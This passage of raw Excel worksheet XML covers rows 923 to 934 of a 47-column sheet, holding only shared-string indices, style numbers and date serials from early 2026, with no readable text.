      <c r="Q923" s="23"/>
      <c r="R923" s="23"/>
      <c r="S923" s="23"/>
      <c r="T923" s="23"/>
      <c r="U923" s="23"/>
      <c r="V923" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W923" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="X923" s="23" t="s">
        <v>8553</v>
      </c>
      <c r="Y923" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z923" s="24">
        <v>46074.1668055556</v>
      </c>
      <c r="AA923" s="23"/>
      <c r="AB923" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC923" s="23"/>
      <c r="AD923" s="23"/>
      <c r="AE923" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="AF923" s="23"/>
      <c r="AG923" s="25" t="s">
        <v>8434</v>
      </c>
      <c r="AH923" s="24"/>
      <c r="AI923" s="23"/>
      <c r="AJ923" s="23"/>
      <c r="AK923" s="23"/>
      <c r="AL923" s="23"/>
      <c r="AM923" s="23"/>
      <c r="AN923" s="23"/>
      <c r="AO923" s="23"/>
      <c r="AP923" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ923" s="24">
        <v>46074.1876388889</v>
      </c>
      <c r="AR923" s="23" t="s">
        <v>8550</v>
      </c>
      <c r="AS923" s="23"/>
      <c r="AT923" s="23"/>
      <c r="AU923" s="23"/>
    </row>
    <row r="924" s="1" customFormat="1" spans="1:47">
      <c r="A924" s="23" t="s">
        <v>8544</v>
      </c>
      <c r="B924" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="C924" s="23" t="s">
        <v>8551</v>
      </c>
      <c r="D924" s="23" t="s">
        <v>8545</v>
      </c>
      <c r="E924" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F924" s="23" t="s">
        <v>10126</v>
      </c>
      <c r="G924" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H924" s="23"/>
      <c r="I924" s="23" t="s">
        <v>8422</v>
      </c>
      <c r="J924" s="23"/>
      <c r="K924" s="23" t="s">
        <v>8548</v>
      </c>
      <c r="L924" s="24">
        <v>46074.1626273148</v>
      </c>
      <c r="M924" s="24">
        <v>46074.1626273148</v>
      </c>
      <c r="N924" s="23" t="s">
        <v>8710</v>
      </c>
      <c r="O924" s="23"/>
      <c r="P924" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="Q924" s="23"/>
      <c r="R924" s="23"/>
      <c r="S924" s="23"/>
      <c r="T924" s="23"/>
      <c r="U924" s="23"/>
      <c r="V924" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W924" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="X924" s="23" t="s">
        <v>8553</v>
      </c>
      <c r="Y924" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z924" s="24">
        <v>46074.1626273148</v>
      </c>
      <c r="AA924" s="23"/>
      <c r="AB924" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC924" s="23"/>
      <c r="AD924" s="23"/>
      <c r="AE924" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="AF924" s="23"/>
      <c r="AG924" s="25" t="s">
        <v>8434</v>
      </c>
      <c r="AH924" s="24"/>
      <c r="AI924" s="23"/>
      <c r="AJ924" s="23"/>
      <c r="AK924" s="23"/>
      <c r="AL924" s="23"/>
      <c r="AM924" s="23"/>
      <c r="AN924" s="23"/>
      <c r="AO924" s="23"/>
      <c r="AP924" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ924" s="24">
        <v>46074.1834606481</v>
      </c>
      <c r="AR924" s="23" t="s">
        <v>8550</v>
      </c>
      <c r="AS924" s="23"/>
      <c r="AT924" s="23"/>
      <c r="AU924" s="23"/>
    </row>
    <row r="925" s="1" customFormat="1" spans="1:47">
      <c r="A925" s="23" t="s">
        <v>8544</v>
      </c>
      <c r="B925" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="C925" s="23" t="s">
        <v>1977</v>
      </c>
      <c r="D925" s="23" t="s">
        <v>8545</v>
      </c>
      <c r="E925" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F925" s="23" t="s">
        <v>10127</v>
      </c>
      <c r="G925" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H925" s="23"/>
      <c r="I925" s="23" t="s">
        <v>8422</v>
      </c>
      <c r="J925" s="23"/>
      <c r="K925" s="23" t="s">
        <v>8548</v>
      </c>
      <c r="L925" s="24">
        <v>46074.1293518519</v>
      </c>
      <c r="M925" s="24">
        <v>46074.1293518519</v>
      </c>
      <c r="N925" s="23" t="s">
        <v>8710</v>
      </c>
      <c r="O925" s="23"/>
      <c r="P925" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="Q925" s="23"/>
      <c r="R925" s="23"/>
      <c r="S925" s="23"/>
      <c r="T925" s="23"/>
      <c r="U925" s="23"/>
      <c r="V925" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W925" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="X925" s="23" t="s">
        <v>8557</v>
      </c>
      <c r="Y925" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z925" s="24">
        <v>46074.1293518519</v>
      </c>
      <c r="AA925" s="23"/>
      <c r="AB925" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC925" s="23"/>
      <c r="AD925" s="23"/>
      <c r="AE925" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="AF925" s="23"/>
      <c r="AG925" s="25" t="s">
        <v>8434</v>
      </c>
      <c r="AH925" s="24"/>
      <c r="AI925" s="23"/>
      <c r="AJ925" s="23"/>
      <c r="AK925" s="23"/>
      <c r="AL925" s="23"/>
      <c r="AM925" s="23"/>
      <c r="AN925" s="23"/>
      <c r="AO925" s="23"/>
      <c r="AP925" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ925" s="24">
        <v>46074.1501851852</v>
      </c>
      <c r="AR925" s="23" t="s">
        <v>8550</v>
      </c>
      <c r="AS925" s="23"/>
      <c r="AT925" s="23"/>
      <c r="AU925" s="23"/>
    </row>
    <row r="926" s="1" customFormat="1" spans="1:47">
      <c r="A926" s="23" t="s">
        <v>8376</v>
      </c>
      <c r="B926" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C926" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D926" s="23" t="s">
        <v>8378</v>
      </c>
      <c r="E926" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F926" s="23" t="s">
        <v>10128</v>
      </c>
      <c r="G926" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H926" s="23"/>
      <c r="I926" s="23" t="s">
        <v>8422</v>
      </c>
      <c r="J926" s="23" t="s">
        <v>8423</v>
      </c>
      <c r="K926" s="23" t="s">
        <v>8384</v>
      </c>
      <c r="L926" s="24">
        <v>46073.8315625</v>
      </c>
      <c r="M926" s="24">
        <v>46073.8315625</v>
      </c>
      <c r="N926" s="23" t="s">
        <v>8536</v>
      </c>
      <c r="O926" s="23"/>
      <c r="P926" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q926" s="23"/>
      <c r="R926" s="23" t="s">
        <v>2484</v>
      </c>
      <c r="S926" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T926" s="23"/>
      <c r="U926" s="23" t="s">
        <v>8387</v>
      </c>
      <c r="V926" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W926" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X926" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y926" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z926" s="24">
        <v>46073.8319097222</v>
      </c>
      <c r="AA926" s="23"/>
      <c r="AB926" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC926" s="23"/>
      <c r="AD926" s="23" t="s">
        <v>8392</v>
      </c>
      <c r="AE926" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF926" s="23"/>
      <c r="AG926" s="25" t="s">
        <v>8475</v>
      </c>
      <c r="AH926" s="24">
        <v>46073.8319560185</v>
      </c>
      <c r="AI926" s="23"/>
      <c r="AJ926" s="23"/>
      <c r="AK926" s="23"/>
      <c r="AL926" s="23"/>
      <c r="AM926" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN926" s="23"/>
      <c r="AO926" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP926" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ926" s="24">
        <v>46073.8527430556</v>
      </c>
      <c r="AR926" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS926" s="23"/>
      <c r="AT926" s="23"/>
      <c r="AU926" s="23"/>
    </row>
    <row r="927" s="1" customFormat="1" spans="1:47">
      <c r="A927" s="23" t="s">
        <v>10129</v>
      </c>
      <c r="B927" s="23" t="s">
        <v>8400</v>
      </c>
      <c r="C927" s="23" t="s">
        <v>726</v>
      </c>
      <c r="D927" s="23" t="s">
        <v>8489</v>
      </c>
      <c r="E927" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F927" s="23" t="s">
        <v>10130</v>
      </c>
      <c r="G927" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H927" s="23"/>
      <c r="I927" s="23" t="s">
        <v>8479</v>
      </c>
      <c r="J927" s="23" t="s">
        <v>10131</v>
      </c>
      <c r="K927" s="23" t="s">
        <v>8431</v>
      </c>
      <c r="L927" s="24">
        <v>46073.7580671296</v>
      </c>
      <c r="M927" s="24">
        <v>46073.7684837963</v>
      </c>
      <c r="N927" s="23"/>
      <c r="O927" s="23"/>
      <c r="P927" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="Q927" s="23"/>
      <c r="R927" s="23" t="s">
        <v>726</v>
      </c>
      <c r="S927" s="23" t="s">
        <v>10132</v>
      </c>
      <c r="T927" s="23" t="s">
        <v>8434</v>
      </c>
      <c r="U927" s="23" t="s">
        <v>10133</v>
      </c>
      <c r="V927" s="23" t="s">
        <v>370</v>
      </c>
      <c r="W927" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X927" s="23" t="s">
        <v>8484</v>
      </c>
      <c r="Y927" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z927" s="24">
        <v>46073.7655092593</v>
      </c>
      <c r="AA927" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB927" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC927" s="23"/>
      <c r="AD927" s="23" t="s">
        <v>8437</v>
      </c>
      <c r="AE927" s="23" t="s">
        <v>8438</v>
      </c>
      <c r="AF927" s="23"/>
      <c r="AG927" s="25" t="s">
        <v>8425</v>
      </c>
      <c r="AH927" s="24">
        <v>46073.7655439815</v>
      </c>
      <c r="AI927" s="23"/>
      <c r="AJ927" s="23"/>
      <c r="AK927" s="23" t="s">
        <v>10134</v>
      </c>
      <c r="AL927" s="23" t="s">
        <v>10135</v>
      </c>
      <c r="AM927" s="23" t="s">
        <v>8487</v>
      </c>
      <c r="AN927" s="23" t="s">
        <v>8442</v>
      </c>
      <c r="AO927" s="23"/>
      <c r="AP927" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ927" s="24">
        <v>46073.7863425926</v>
      </c>
      <c r="AR927" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS927" s="23"/>
      <c r="AT927" s="23"/>
      <c r="AU927" s="23"/>
    </row>
    <row r="928" s="1" customFormat="1" spans="1:47">
      <c r="A928" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B928" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C928" s="23" t="s">
        <v>3486</v>
      </c>
      <c r="D928" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E928" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F928" s="23" t="s">
        <v>10136</v>
      </c>
      <c r="G928" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H928" s="23"/>
      <c r="I928" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J928" s="23" t="s">
        <v>8497</v>
      </c>
      <c r="K928" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L928" s="24">
        <v>46073.6501967593</v>
      </c>
      <c r="M928" s="24">
        <v>46073.6501967593</v>
      </c>
      <c r="N928" s="23" t="s">
        <v>8536</v>
      </c>
      <c r="O928" s="23"/>
      <c r="P928" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q928" s="23"/>
      <c r="R928" s="23" t="s">
        <v>8498</v>
      </c>
      <c r="S928" s="23" t="s">
        <v>3486</v>
      </c>
      <c r="T928" s="23"/>
      <c r="U928" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V928" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W928" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X928" s="23" t="s">
        <v>8499</v>
      </c>
      <c r="Y928" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z928" s="24">
        <v>46073.6520601852</v>
      </c>
      <c r="AA928" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB928" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC928" s="23"/>
      <c r="AD928" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE928" s="23" t="s">
        <v>8500</v>
      </c>
      <c r="AF928" s="23"/>
      <c r="AG928" s="25" t="s">
        <v>8425</v>
      </c>
      <c r="AH928" s="24">
        <v>46073.6520949074</v>
      </c>
      <c r="AI928" s="23"/>
      <c r="AJ928" s="23"/>
      <c r="AK928" s="23"/>
      <c r="AL928" s="23"/>
      <c r="AM928" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN928" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO928" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP928" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ928" s="24">
        <v>46073.6728935185</v>
      </c>
      <c r="AR928" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS928" s="23"/>
      <c r="AT928" s="23"/>
      <c r="AU928" s="23"/>
    </row>
    <row r="929" s="1" customFormat="1" spans="1:47">
      <c r="A929" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B929" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C929" s="23" t="s">
        <v>3430</v>
      </c>
      <c r="D929" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E929" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F929" s="23" t="s">
        <v>10137</v>
      </c>
      <c r="G929" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H929" s="23"/>
      <c r="I929" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J929" s="23" t="s">
        <v>8734</v>
      </c>
      <c r="K929" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L929" s="24">
        <v>46073.382974537</v>
      </c>
      <c r="M929" s="24">
        <v>46073.6042939815</v>
      </c>
      <c r="N929" s="23"/>
      <c r="O929" s="23"/>
      <c r="P929" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q929" s="23"/>
      <c r="R929" s="23" t="s">
        <v>3430</v>
      </c>
      <c r="S929" s="23" t="s">
        <v>8735</v>
      </c>
      <c r="T929" s="23"/>
      <c r="U929" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V929" s="23" t="s">
        <v>370</v>
      </c>
      <c r="W929" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X929" s="23" t="s">
        <v>8622</v>
      </c>
      <c r="Y929" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z929" s="24">
        <v>46073.3866666667</v>
      </c>
      <c r="AA929" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB929" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC929" s="23"/>
      <c r="AD929" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE929" s="23" t="s">
        <v>8438</v>
      </c>
      <c r="AF929" s="23"/>
      <c r="AG929" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH929" s="24">
        <v>46073.3866898148</v>
      </c>
      <c r="AI929" s="23"/>
      <c r="AJ929" s="23"/>
      <c r="AK929" s="23"/>
      <c r="AL929" s="23"/>
      <c r="AM929" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN929" s="23" t="s">
        <v>8442</v>
      </c>
      <c r="AO929" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP929" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ929" s="24">
        <v>46073.4075</v>
      </c>
      <c r="AR929" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS929" s="23"/>
      <c r="AT929" s="23"/>
      <c r="AU929" s="23"/>
    </row>
    <row r="930" s="1" customFormat="1" spans="1:47">
      <c r="A930" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B930" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C930" s="23" t="s">
        <v>3486</v>
      </c>
      <c r="D930" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E930" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F930" s="23" t="s">
        <v>10138</v>
      </c>
      <c r="G930" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H930" s="23"/>
      <c r="I930" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J930" s="23" t="s">
        <v>8497</v>
      </c>
      <c r="K930" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L930" s="24">
        <v>46073.5615740741</v>
      </c>
      <c r="M930" s="24">
        <v>46073.5615740741</v>
      </c>
      <c r="N930" s="23" t="s">
        <v>8536</v>
      </c>
      <c r="O930" s="23"/>
      <c r="P930" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q930" s="23"/>
      <c r="R930" s="23" t="s">
        <v>10139</v>
      </c>
      <c r="S930" s="23" t="s">
        <v>3486</v>
      </c>
      <c r="T930" s="23"/>
      <c r="U930" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V930" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W930" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X930" s="23" t="s">
        <v>8499</v>
      </c>
      <c r="Y930" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z930" s="24">
        <v>46073.565150463</v>
      </c>
      <c r="AA930" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB930" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC930" s="23"/>
      <c r="AD930" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE930" s="23" t="s">
        <v>8500</v>
      </c>
      <c r="AF930" s="23"/>
      <c r="AG930" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH930" s="24">
        <v>46073.5651736111</v>
      </c>
      <c r="AI930" s="23"/>
      <c r="AJ930" s="23"/>
      <c r="AK930" s="23"/>
      <c r="AL930" s="23"/>
      <c r="AM930" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN930" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO930" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP930" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ930" s="24">
        <v>46073.5859837963</v>
      </c>
      <c r="AR930" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS930" s="23"/>
      <c r="AT930" s="23"/>
      <c r="AU930" s="23"/>
    </row>
    <row r="931" s="1" customFormat="1" spans="1:47">
      <c r="A931" s="23" t="s">
        <v>10140</v>
      </c>
      <c r="B931" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C931" s="23" t="s">
        <v>3446</v>
      </c>
      <c r="D931" s="23" t="s">
        <v>10141</v>
      </c>
      <c r="E931" s="23" t="s">
        <v>8539</v>
      </c>
      <c r="F931" s="23" t="s">
        <v>10142</v>
      </c>
      <c r="G931" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H931" s="23"/>
      <c r="I931" s="23" t="s">
        <v>8479</v>
      </c>
      <c r="J931" s="23" t="s">
        <v>10143</v>
      </c>
      <c r="K931" s="23" t="s">
        <v>8431</v>
      </c>
      <c r="L931" s="24">
        <v>46063.4489351852</v>
      </c>
      <c r="M931" s="24">
        <v>46073.5201967593</v>
      </c>
      <c r="N931" s="23" t="s">
        <v>8536</v>
      </c>
      <c r="O931" s="23"/>
      <c r="P931" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="Q931" s="23"/>
      <c r="R931" s="23" t="s">
        <v>3446</v>
      </c>
      <c r="S931" s="23" t="s">
        <v>3545</v>
      </c>
      <c r="T931" s="23" t="s">
        <v>8434</v>
      </c>
      <c r="U931" s="23" t="s">
        <v>10144</v>
      </c>
      <c r="V931" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W931" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="X931" s="23" t="s">
        <v>8742</v>
      </c>
      <c r="Y931" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z931" s="24">
        <v>46072.4579166667</v>
      </c>
      <c r="AA931" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB931" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC931" s="23"/>
      <c r="AD931" s="23" t="s">
        <v>8437</v>
      </c>
      <c r="AE931" s="23" t="s">
        <v>8500</v>
      </c>
      <c r="AF931" s="23"/>
      <c r="AG931" s="25" t="s">
        <v>8452</v>
      </c>
      <c r="AH931" s="24">
        <v>46072.4580324074</v>
      </c>
      <c r="AI931" s="23"/>
      <c r="AJ931" s="23"/>
      <c r="AK931" s="23" t="s">
        <v>10145</v>
      </c>
      <c r="AL931" s="23" t="s">
        <v>4246</v>
      </c>
      <c r="AM931" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN931" s="23"/>
      <c r="AO931" s="23"/>
      <c r="AP931" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ931" s="24">
        <v>46072.47875</v>
      </c>
      <c r="AR931" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS931" s="23" t="s">
        <v>10146</v>
      </c>
      <c r="AT931" s="23" t="s">
        <v>10147</v>
      </c>
      <c r="AU931" s="23" t="s">
        <v>8999</v>
      </c>
    </row>
    <row r="932" s="1" customFormat="1" spans="1:47">
      <c r="A932" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B932" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C932" s="23" t="s">
        <v>3486</v>
      </c>
      <c r="D932" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E932" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F932" s="23" t="s">
        <v>10148</v>
      </c>
      <c r="G932" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H932" s="23"/>
      <c r="I932" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J932" s="23" t="s">
        <v>8497</v>
      </c>
      <c r="K932" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L932" s="24">
        <v>46073.3773032407</v>
      </c>
      <c r="M932" s="24">
        <v>46073.493275463</v>
      </c>
      <c r="N932" s="23" t="s">
        <v>8536</v>
      </c>
      <c r="O932" s="23"/>
      <c r="P932" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q932" s="23"/>
      <c r="R932" s="23" t="s">
        <v>10149</v>
      </c>
      <c r="S932" s="23" t="s">
        <v>3486</v>
      </c>
      <c r="T932" s="23"/>
      <c r="U932" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V932" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W932" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X932" s="23" t="s">
        <v>8499</v>
      </c>
      <c r="Y932" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z932" s="24">
        <v>46073.3805555556</v>
      </c>
      <c r="AA932" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB932" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC932" s="23"/>
      <c r="AD932" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE932" s="23" t="s">
        <v>8500</v>
      </c>
      <c r="AF932" s="23"/>
      <c r="AG932" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH932" s="24">
        <v>46073.3805787037</v>
      </c>
      <c r="AI932" s="23"/>
      <c r="AJ932" s="23"/>
      <c r="AK932" s="23"/>
      <c r="AL932" s="23"/>
      <c r="AM932" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN932" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO932" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP932" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ932" s="24">
        <v>46073.4013888889</v>
      </c>
      <c r="AR932" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS932" s="23"/>
      <c r="AT932" s="23"/>
      <c r="AU932" s="23"/>
    </row>
    <row r="933" s="1" customFormat="1" spans="1:47">
      <c r="A933" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B933" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C933" s="23" t="s">
        <v>3486</v>
      </c>
      <c r="D933" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E933" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F933" s="23" t="s">
        <v>10150</v>
      </c>
      <c r="G933" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H933" s="23"/>
      <c r="I933" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J933" s="23" t="s">
        <v>8497</v>
      </c>
      <c r="K933" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L933" s="24">
        <v>46073.4918402778</v>
      </c>
      <c r="M933" s="24">
        <v>46073.4918402778</v>
      </c>
      <c r="N933" s="23" t="s">
        <v>8536</v>
      </c>
      <c r="O933" s="23"/>
      <c r="P933" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q933" s="23"/>
      <c r="R933" s="23" t="s">
        <v>10139</v>
      </c>
      <c r="S933" s="23" t="s">
        <v>3486</v>
      </c>
      <c r="T933" s="23"/>
      <c r="U933" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V933" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W933" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X933" s="23" t="s">
        <v>8499</v>
      </c>
      <c r="Y933" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z933" s="24">
        <v>46073.492037037</v>
      </c>
      <c r="AA933" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB933" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC933" s="23"/>
      <c r="AD933" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE933" s="23" t="s">
        <v>8500</v>
      </c>
      <c r="AF933" s="23"/>
      <c r="AG933" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH933" s="24">
        <v>46073.4920601852</v>
      </c>
      <c r="AI933" s="23"/>
      <c r="AJ933" s="23"/>
      <c r="AK933" s="23"/>
      <c r="AL933" s="23"/>
      <c r="AM933" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN933" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO933" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP933" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ933" s="24">
        <v>46073.5128703704</v>
      </c>
      <c r="AR933" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS933" s="23"/>
      <c r="AT933" s="23"/>
      <c r="AU933" s="23"/>
    </row>
    <row r="934" s="1" customFormat="1" spans="1:47">
      <c r="A934" s="23" t="s">
        <v>8399</v>
      </c>
      <c r="B934" s="23" t="s">
        <v>8400</v>
      </c>
      <c r="C934" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D934" s="23" t="s">
        <v>8401</v>
      </c>
      <c r="E934" s="23" t="s">
        <v>8379</v>
      </c>
      <c r="F934" s="23" t="s">
        <v>10151</v>
      </c>
      <c r="G934" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H934" s="23"/>
      <c r="I934" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J934" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K934" s="23" t="s">
        <v>8404</v>
      </c>
      <c r="L934" s="24">
        <v>46072.4830787037</v>
      </c>
      <c r="M934" s="24">
        <v>46073.4323726852</v>
      </c>
      <c r="N934" s="23" t="s">
        <v>8536</v>
      </c>
      <c r="O934" s="23"/>
      <c r="P934" s="23" t="s">
        <v>8400</v>
      </c>
      <c r="Q934" s="23"/>
      <c r="R934" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S934" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T934" s="23"/>
      <c r="U934" s="23" t="s">
        <v>8406</v>
      </c>
      <c r="V934" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W934" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X934" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y934" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z934" s="24">
        <v>46072.4838773148</v>
      </c>
      <c r="AA934" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB934" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC934" s="23"/>
      <c r="AD934" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE934" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF934" s="23"/>
      <c r="AG934" s="25" t="s">
        <v>8425</v>
      </c>
      <c r="AH934" s="24">
        <v>46072.483912037</v>
      </c>
      <c r="AI934" s="23"/>
      <c r="AJ934" s="23"/>
      <c r="AK934" s="23" t="s">
        <v>10152</v>
      </c>
      <c r="AL934" s="23" t="s">
        <v>8411</v>
      </c>
      <c r="AM934" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN934" s="23" t="s">
        <v>8412</v>
      </c>
